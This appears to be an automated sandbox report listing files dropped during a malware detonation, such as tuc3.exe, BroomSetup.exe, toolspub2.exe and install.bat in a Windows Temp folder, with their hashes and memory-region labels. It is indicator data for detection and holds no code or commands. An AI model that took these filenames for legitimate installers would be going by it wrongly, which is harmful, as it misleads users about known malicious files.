C:\Users\Admin\AppData\Local\Temp\B39.exe

MD5 dc6fbf2cd9ad1f1f0ac200e9bec7ea3f
SHA1 c3af9d82d270829784339331dea63f927400e0d4
SHA256 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590
SHA512 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 5b03d4f455c64b6d3da634418b3a9693
SHA1 285b8dfe363af4ccf41417f52c5bdf76550b84f8
SHA256 ec9563b238d2c81a497f535f159d4af60506972c6c0ec21d9b0cc3227adf5b96
SHA512 272fc2dcb58cf86418de229bbe0e836a2c6ce378a5f6ae4006733b301d75654d4391093259aaf2c779b973aeeefeab7dd96d837352c0ddfc963f0b0acbada7b7

memory/4652-106-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 e69ed4335ce94401642886f0189caa98
SHA1 34a72fdfbcd1a0d6e2d998de5bfba641f7eabc5f
SHA256 d7f6730b12cb246369f8b53c47e72545a52c30359d4b6d01e0e6aeefd6d6b54a
SHA512 94bace53f37416147f2d18fce9efd0d922e95681c7dac0d7a58ee8aa2f76529b5ec58c71df3d7f5de1077cb3bca0d8e7ba92387e987432c1ee1cc7a0c7ec3997

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 e8becd41e05c0d81bc99c204fe02f6ea
SHA1 9307a08031fe0d1064328cb387bc2c579cc152c8
SHA256 8505920fc9333dfeedd83d56ec1071bf53d6d457e73d549eda929906a69f181a
SHA512 41e7a9f9d3a68f7bbe530f5060cd66cde25aa6385be579000fdcea3d670aef87d4de7cdf6ac7ba98f2c27a8760e5696a08a5da444891d6e675e86012c87eea44

memory/5096-109-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

memory/4944-112-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 35559b537562ff22aa042b2f18c237d6
SHA1 6fafb124c21b9125e9eb0884a3cfffee7eb87de3
SHA256 6ea16efcd9f0e6c79681107156ad04b05f28bbab0983eadbe2fc6e584ccd4fbd
SHA512 8e57f3a7b41df5e1d677ce24b930926585d938e795c5d16e8ef0142d01f005beed8c4dc6363c45df1a842442384349536259fa0203d5061c04430362a18d99c4

memory/4944-117-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp

MD5 f70bdc96bef577c5ad7a6354ea7f4be1
SHA1 730049666451ee74f769cfd69640645df3fcd360
SHA256 1c54c47ed1cc78c6a4d06abd9ff071470e7c2c7fa9183f4e735e83264f369ad5
SHA512 74696ccb073b74e088860d4f0ea6b78b9a05bb6cd0102db6de5bd6a49d385591872fc176aa003c4dd947c3d925c1d1512224bc11613c3d22a8c819d7fb75f790

C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp

MD5 b120b60e06de6da7ce4c721b5e6a945e
SHA1 b8ede41718c1146587e14f16956fd6570c5b92ed
SHA256 c719d7c6b6ced2da98f43a916535042dd3c4b28c70621d946f8b94fedee6b8bf
SHA512 d7d7307a4c22703d74837c85acfac140747571dd5be175d12ee9f8bddc8160e10e819d3e10c562546d762a12415853c58b1b8e6b09154194f8a74f17ea282e79

memory/3832-111-0x0000000000980000-0x0000000000A80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat

MD5 60c9624e093baac4bef11ab4fc846111
SHA1 07a25911c81e04608a0dc6fb065524a9da82dd65
SHA256 e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d
SHA512 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24

memory/3832-110-0x00000000008F0000-0x00000000008F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-P8O7H.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/4324-134-0x0000000074430000-0x0000000074BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-P8O7H.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

memory/396-135-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsh9D0.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nsh9D0.tmp\INetC.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e